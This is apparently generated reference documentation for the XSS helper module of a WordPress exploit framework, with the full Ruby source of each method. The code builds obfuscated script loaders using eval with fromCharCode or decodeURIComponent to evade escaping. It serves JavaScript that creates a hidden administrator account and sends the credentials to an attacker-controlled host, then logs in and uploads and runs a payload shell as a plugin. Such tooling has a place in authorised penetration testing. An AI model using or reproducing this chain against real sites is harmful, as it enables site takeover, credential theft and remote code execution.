Module: Wpxf::WordPress::Xss

Includes:

ERB::Util, Wpxf, Net::HttpServer, Plugin

Included in:

ReflectedXss, StoredXss

Defined in:

lib/wpxf/wordpress/xss.rb

Overview

Provides helper methods for generating scripts for XSS attacks.

Instance Method Summary

• #initialize ⇒ Object

  Initialize a new instance of Xss.

• #on_http_request(path, params, headers) ⇒ String

  Default HTTP request handler for XSS modules which will serve the script required to create new administrator users and upload a payload shell.

• #upload_shell(username, password) ⇒ Boolean

  Upload the selected payload as a WordPress plugin.

• #wordpress_js_create_user ⇒ String

  A script that will create a new admin user and post the credentials back to #xss_url.

• #xss_ascii_encoded_include_script ⇒ String

  A script that includes the user creation JavaScript without any spaces or quotation marks in the script that may be escaped by the likes of magic-quotes.

• #xss_host ⇒ String

  The address of the host listening for a conneciton.

• #xss_include_script ⇒ String

  A script that includes the user creation JavaScript.

• #xss_path ⇒ String

  The path to make cross-site requests to.

• #xss_shell_success ⇒ Boolean

  True if the XSS shell upload was successful.

• #xss_url ⇒ String

  The full URL to make cross-site requests to.

• #xss_url_and_ascii_encoded_include_script ⇒ String

  The URL encoded value of #xss_ascii_encoded_include_script.

Methods included from Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #start_http_server, #stop_http_server

Instance Method Details

#initialize ⇒ Object

Initialize a new instance of Wpxf::WordPress::Xss.

# File 'lib/wpxf/wordpress/xss.rb', line 13

def initialize
  super
  @success = false

  _update_info_without_validation(
    desc: %(
      This module stores a script which will be executed when
      an admin user visits the vulnerable page. Execution of the script
      will create a new admin user which will be used to upload
      and execute the selected payload in the context of the
      web server.
    )
  )

  register_options([
    StringOption.new(
      name: 'xss_host',
      desc: 'The address of the host listening for a connection',
      required: true
    ),
    StringOption.new(
      name: 'xss_path',
      desc: 'The path to access via the cross-site request',
      default: Utility::Text.rand_alpha(8),
      required: true
    )
  ])
end

#on_http_request(path, params, headers) ⇒ String

Default HTTP request handler for XSS modules which will serve the script required to create new administrator users and upload a payload shell.

Parameters:

• path (String) —

  the path requested.

• params (Hash) —

  the query string parameters.

• headers (Hash) —

  the HTTP headers.

Returns:

• (String) —

  the response body to send to the client.

# File 'lib/wpxf/wordpress/xss.rb', line 106

def on_http_request(path, params, headers)
  if params['u'] && params['p']
    emit_success "Created a new administrator user, #{params['u']}:#{params['p']}"
    store_credentials params['u'], params['p']
    stop_http_server

    # Set this for #run to pick up to determine success state
    @success = upload_shell(params['u'], params['p'])

    ''
  else
    emit_info 'Incoming request received, serving JavaScript...'
    wordpress_js_create_user
  end
end

#upload_shell(username, password) ⇒ Boolean

Upload the selected payload as a WordPress plugin.

Parameters:

• username (String) —

  the username to authenticate with.

• password (String) —

  the password to authenticate with.

Returns:

• (Boolean) —

  true if successful.

# File 'lib/wpxf/wordpress/xss.rb', line 126

def upload_shell(username, password)
  cookie = authenticate_with_wordpress(username, password)
  return false unless cookie

  plugin_name = Utility::Text.rand_alpha(10)
  payload_name = Utility::Text.rand_alpha(10)

  emit_info 'Uploading payload...'
  res = upload_payload_as_plugin_and_execute(plugin_name, payload_name, cookie)

  !res.nil?
end

#wordpress_js_create_user ⇒ String

Returns a script that will create a new admin user and post the credentials back to #xss_url.

Returns:

• (String) —

  a script that will create a new admin user and post the credentials back to #xss_url.

# File 'lib/wpxf/wordpress/xss.rb', line 82

def wordpress_js_create_user
  variables = {
    '$wordpress_url_new_user' => wordpress_url_new_user,
    '$username' => Utility::Text.rand_alpha(6),
    '$password' => "#{Utility::Text.rand_alphanumeric(10)}!",
    '$email' => "#{Utility::Text.rand_alpha(7)}@#{Utility::Text.rand_alpha(10)}.com",
    '$xss_url' => xss_url
  }

  create_user_script = Wpxf::DataFile.new('js', 'create_wp_user.js')

  %(
    #{js_ajax_download}
    #{js_ajax_post}
    #{create_user_script.content_with_named_vars(variables)}
  )
end

#xss_ascii_encoded_include_script ⇒ String

Returns a script that includes the user creation JavaScript without any spaces or quotation marks in the script that may be escaped by the likes of magic-quotes.

Returns:

• (String) —

  a script that includes the user creation JavaScript without any spaces or quotation marks in the script that may be escaped by the likes of magic-quotes.

# File 'lib/wpxf/wordpress/xss.rb', line 71

def xss_ascii_encoded_include_script
  "eval(String.fromCharCode(#{xss_include_script.bytes.join(',')}))"
end

#xss_host ⇒ String

Returns the address of the host listening for a conneciton.

Returns:

• (String) —

  the address of the host listening for a conneciton.

# File 'lib/wpxf/wordpress/xss.rb', line 43

def xss_host
  normalized_option_value('xss_host')
end

#xss_include_script ⇒ String

Returns a script that includes the user creation JavaScript.

Returns:

• (String) —

  a script that includes the user creation JavaScript.

# File 'lib/wpxf/wordpress/xss.rb', line 58

def xss_include_script
  script = [
    'var a = document.createElement("script");',
    "a.setAttribute(\"src\", \"#{xss_url}\");",
    'document.head.appendChild(a);'
  ].join

  "eval(decodeURIComponent(/#{url_encode(script)}/.source))"
end

#xss_path ⇒ String

Returns the path to make cross-site requests to.

Returns:

• (String) —

  the path to make cross-site requests to.

# File 'lib/wpxf/wordpress/xss.rb', line 48

def xss_path
  normalized_option_value('xss_path')
end

#xss_shell_success ⇒ Boolean

Returns true if the XSS shell upload was successful.

Returns:

• (Boolean) —

  true if the XSS shell upload was successful.

# File 'lib/wpxf/wordpress/xss.rb', line 140

def xss_shell_success
  @success
end

#xss_url ⇒ String

Returns the full URL to make cross-site requests to.

Returns:

• (String) —

  the full URL to make cross-site requests to.

# File 'lib/wpxf/wordpress/xss.rb', line 53

def xss_url
  "http://#{xss_host}:#{http_server_bind_port}/#{xss_path}"
end

#xss_url_and_ascii_encoded_include_script ⇒ String

Returns the URL encoded value of #xss_ascii_encoded_include_script.

Returns:

• (String) —

  the URL encoded value of #xss_ascii_encoded_include_script.

# File 'lib/wpxf/wordpress/xss.rb', line 76

def xss_url_and_ascii_encoded_include_script
  url_encode(xss_ascii_encoded_include_script)
end